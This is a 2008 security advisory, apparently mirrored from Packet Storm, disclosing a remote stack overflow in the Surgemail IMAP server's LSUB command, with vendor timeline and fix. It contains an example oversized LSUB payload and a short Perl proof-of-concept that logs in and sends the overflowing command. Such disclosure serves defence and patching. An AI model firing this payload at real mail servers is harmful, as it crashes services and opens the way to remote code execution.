A remote vanilla stack overflow vulnerability exists in the Surgemail IMAP server. The vulnerability is caused due to a boundary error in the IMAP server, when processing overly long arguments of the 'LSUB' command. The vulnerability results in a simple stack overflow condition that can be trivially exploited.
6caf1134a18b78d821475643125ddbaac4ab936cf127a25b6b9b7c01c6c4eaf2
INFIGO IS Security Advisory #ADV-2008-03-07
http://www.infigo.hr/en/
Title: Surgemail 38k4 IMAP server remote stack overflow
Advisory ID: INFIGO-2008-03-07
Date: 2008-03-21
Advisory URL: http://www.infigo.hr/en/in_focus/advisories/INFIGO-2008-03-07
Impact: Remote code execution
Risk Level: High
Vulnerability Type: Remote
==[ Overview
SurgeMail Mail Server Software Suite - combines advanced features, high
performance and ease of use. Works on Windows, UNIX (Linux, Solaris etc.),
Mac OSX, FreeBSD and others. Surgemail integrated email server is an
Antispam Server, Antivirus Server, Webmail Server, Groupware Server,
Blog Server and much more.
==[ Vulnerability
A remote vanilla stack overflow vulnerability exists in the Surgemail IMAP
server. The vulnerability is caused due to a boundary error in the IMAP
server, when processing overly long arguments of the 'LSUB' command.
The vulnerability results in a simple stack overflow condition that can be
trivially exploited.
Example:
a002 LSUB "//AA:" * 12000 + " " + "//AA:" * 21000 + "\r\n"
==[ Affected Version
The vulnerability has been identified in the latest available 38k4-4.
It was tested on Windows XP SP2.
==[ Fix
The vendor released a new version that fixes the vulnerability available at
http://www.netwinsite.com/surgemail/.
==[ PoC Exploit
http://www.infigo.hr/files/surgemail.pl
#
#
# Surgemail stack overflow PoC exploit - latest version
# Coded by Leon Juranic <leon.juranic@infigo.hr>
# http://www.infigo.hr/en/
#
use IO::Socket;
$host = "192.168.0.15";
$user = "test";
$pass = "test";
$str = "//AA:";
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => "143",
Proto => "tcp") || die ("Cannot connect!!!\n");
print $a = <$sock>;
print $sock "a001 LOGIN $user $pass\r\n";
print $a = <$sock>;
print $sock "a002 LSUB " . $str x 12000 . " " . $str x 21000 . "\r\n";
print $a = <$sock>;
==[ Vendor status
01.09.2008 - Initial contact
01.10.2008 - Initial vendor response
03.19.2008 - Vendor status update - Patch available
03.21.2008 - Coordinated public disclosure
==[ Credits
Vulnerability discovered by Leon Juranic <leon.juranic@infigo.hr>.
==[ INFIGO IS Security Contact
INFIGO IS,
WWW : http://www.infigo.hr/en/
E-mail : infocus@infigo.hr
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed